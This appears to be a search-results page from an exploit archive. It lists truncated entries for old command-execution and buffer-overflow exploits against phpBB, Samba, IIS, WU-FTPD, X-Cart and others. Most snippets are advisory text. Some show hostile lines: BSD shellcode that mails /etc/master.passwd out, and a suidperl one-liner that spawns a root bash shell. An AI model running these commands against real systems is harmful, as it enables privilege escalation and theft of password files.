34 matches found
phpBB 2.0.10 - Remote Command Execution
!/usr/bin/perl use IO::Socket; @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@ @@! @@@ @@! @@@ !@@ @@! @@@ @!@!!@! @!@ !@! !@@!! @!@!@!@! !!: :!! !!: !!! !:! !!: !!! : : : :.:: : ::.: : : : : phpBB = 2.0.10 remote commands exec exploit based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0...
phpbb.php.txt
!/usr/bin/php -q 15th November 2004 : 4:04 a.m bug found by How Dark http://www.howdark.com 1st October 2004 Requirement: PHP 4.x with curl extension; Selamat Hari Raya / if !functionexists'curlinit' echo "cURL extension required\n"; exit; if $argv2 $url = $argv1; $command = $argv2; else echo...
bsd/x86 - cat /etc/master.passwd | mail email 92 bytes
bsd/x86 cat /etc/master.passwd | mail email 92 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char...
Qualiteam X-Cart 3.x - general.php?perl_binary Arbitrary Command Execution
Qualiteam X-Cart 3.x - general.php?perlbinary Arbitrary Command Execution source: https://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of...
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)
// source: https://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt...
WinRAR 2.903.03.10 - Archive File Extension Buffer Overrun
WinRAR 2.903.03.10 - Archive File Extension Buffer Overrun source: https://www.securityfocus.com/bid/6664/info A vulnerability has been discovered in WinRAR. The problem occurs when the affected application opens an archive containing a file with an overly long file extension. It has been reporte...
[SECURITY] [DSA-138-1] Remote execution exploit in gallery
Package : gallery Problem type : remote exploit Debian-specific: no A problem was found in gallery a web-based photo album toolkit: it was possible to pass in the GALLERYBASEDIR variable remotely. This made it possible to execute commands under the uid of web-server. This has been fixed in versio...
Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow
Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow / source: https://www.securityfocus.com/bid/4413/info Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems. A vulnerability has been reported with some...
AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution
source: https://www.securityfocus.com/bid/3985/info Search.CGI is a component of the HTMLsearch Search Engine software distributed by AHG. The software is available for the Unix, Linux, and Microsoft platforms. The search.cgi script included with the AHG Search Engine does not adequately filter...
Microsoft IIS 3.04.05.0 - PWS Escaped Characters Decoding Command Execution (5)
Microsoft IIS 3.04.05.0 - PWS Escaped Characters Decoding Command Execution 5 source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, i...
ListMail v112 - Command Execution
Exploit for cgi platform in category web applications ================================= ListMail v112 - Command Execution ================================= !/usr/bin/perl -w Listmail v112 by P.M.Systems / PoC Exploit Listmail is a powerful, hands-free mailing list manager which is exploitable due...
WU-FTPD 2.4.22.5 .02.6.02.6.12.6.2 - FTP Conversion
WU-FTPD 2.4.22.5 .02.6.02.6.12.6.2 - FTP Conversion source: https://www.securityfocus.com/bid/2240/info Some FTP servers provide a "conversion" service that pipes a requested file through a program, for example a decompression utility such as "tar", before it is passed to the remote user. Under...
faxsurvey.txt
Date: Tue, 4 Aug 1998 07:41:24 -0700 Reply-To: [email protected] From: Tom Subject: remote exploit in faxsurvey cgi-script Hi! There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server. All the attacker has t...
suid_perl 5.001 vulnerability
Exploit for linux platform in category local exploits ============================= suidperl 5.001 vulnerability ============================= !/usr/bin/suidperl -U $ENVPATH="/bin:/usr/bin"; $=0;$=0; exec"/bin/bash"; 0day.today 2018-04-09...